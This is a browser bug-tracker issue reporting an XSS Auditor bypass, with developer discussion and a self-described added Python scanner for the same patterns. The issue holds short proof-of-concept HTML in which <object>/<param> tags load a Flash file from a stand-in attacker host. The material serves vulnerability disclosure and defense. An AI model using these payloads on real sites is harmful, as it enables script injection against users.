
Issue metadata

Status: Duplicate
Merged: issue 783618
Closed: Nov 10
EstimatedDays: ----
NextAction: ----
OS: Linux , Android , Windows , Chrome , Mac
Pri: 3
Type: Bug


XSS Auditor bypass using object tag and url parameter

Reported by, Dec 26 2016

Issue description

I'd like to report an XSS Auditor bypass bug.
PoC is here:

<object allowscriptaccess="always">
<param name="url" value="https://attacker/xss.swf">
</object>

Could you confirm this bug?

Version 57.0.2962.0 (Official Build) canary (64 bit)
It seems it works via the name="code" also.

<object allowscriptaccess="always">
<param name="code" value="https://attacker/xss.swf">
</object>

Components: Blink>SecurityFeature
Labels: -Type-Bug-Security -Restrict-View-SecurityTeam Type-Bug
Status: Assigned
Thanks for the report. Tom, could you take a look when you get a chance?
Status: Started
Looks like there are a few more <param> cases to cover. Thanks for the report.
I'm also going to filter the allowscriptaccess attribute in <object>, just because, even though there's enough malice that can be accomplished even without it. is where we decide which name=xxx parameters are candidates for sanitization. has its own ideas about URL parameters.

Mike, should we unify the two?  Have a suggestion about who else might weigh in on param element behaviour?
Mike: |allowscriptaccessAttr| token doesn't exist, can we add this to whatever IDL generates these?
Bouncing to mike to get some answers.  Pls re-assign to me afterwards.

Comment 9 by, Feb 23 2017

Labels: xssauditor

Comment 10 by, Feb 24 2017

Labels: OS-Android OS-Chrome OS-Linux OS-Mac OS-Windows Pri-3
I missed this, apologies:

1.  I don't think we handle `allowscriptaccess` in Blink today; we just hand all the params over to the plugin and let it figure out what it ought to be doing with them. Feel free to add it to `Source/core/html/HTMLAttributeNames.json5`.

2.  I think unifying the URL parameter behavior makes sense. Do you have a concrete suggestion for doing so?
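To make the two points above concrete (which <param> names are candidates for sanitization, and treating allowscriptaccess as a filtered attribute), here is an added illustration in Python; it is not Blink's XSSAuditor code. The names beyond "url" and "code" in URL_PARAM_NAMES, and the sample fragments, are assumptions made for the example.

```python
"""Illustrative <object>/<param> scanner for the cases discussed in this issue.

Added example, not Blink code: walks a fragment with html.parser and reports,
per <object>, whether allowscriptaccess is set and which <param> children
carry a URL-bearing name that a reflected-payload filter should consider.
"""
from html.parser import HTMLParser

# "url" and "code" come from the report; "movie", "src", "data" are assumed
# extra names to show how the candidate list would be extended.
URL_PARAM_NAMES = frozenset({"url", "code", "movie", "src", "data"})


class ObjectParamScanner(HTMLParser):
    """Collect each <object> together with its flagged <param> children."""

    def __init__(self):
        super().__init__()
        self.findings = []    # one dict per <object> seen
        self._current = None  # the <object> currently being walked

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if tag == "object":
            self._current = {
                "allowscriptaccess": "allowscriptaccess" in attrs,
                "url_params": [],  # (name, value) pairs worth sanitizing
            }
            self.findings.append(self._current)
        elif tag == "param" and self._current is not None:
            name = attrs.get("name", "").lower()
            if name in URL_PARAM_NAMES:
                self._current["url_params"].append((name, attrs.get("value", "")))

    def handle_endtag(self, tag):
        if tag == "object":
            self._current = None  # an unclosed <object> simply runs to the end


def scan(html):
    """Return the per-<object> findings for an HTML fragment."""
    parser = ObjectParamScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


def needs_sanitization(html):
    """True if any <object> sets allowscriptaccess or has a URL-bearing <param>."""
    return any(f["allowscriptaccess"] or f["url_params"] for f in scan(html))
```

Run against the two PoC fragments from the report, both come back as candidates; an <object> whose only <param> is a non-URL name such as "quality" does not.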
Labels: Hotlist-EnamelAndFriendsFixIt
Mergedinto: 783618
Status: Duplicate
Oddly enough, this came in again recently.  Doing the uncool thing of duping the old into the new, because that's where the work is happening.
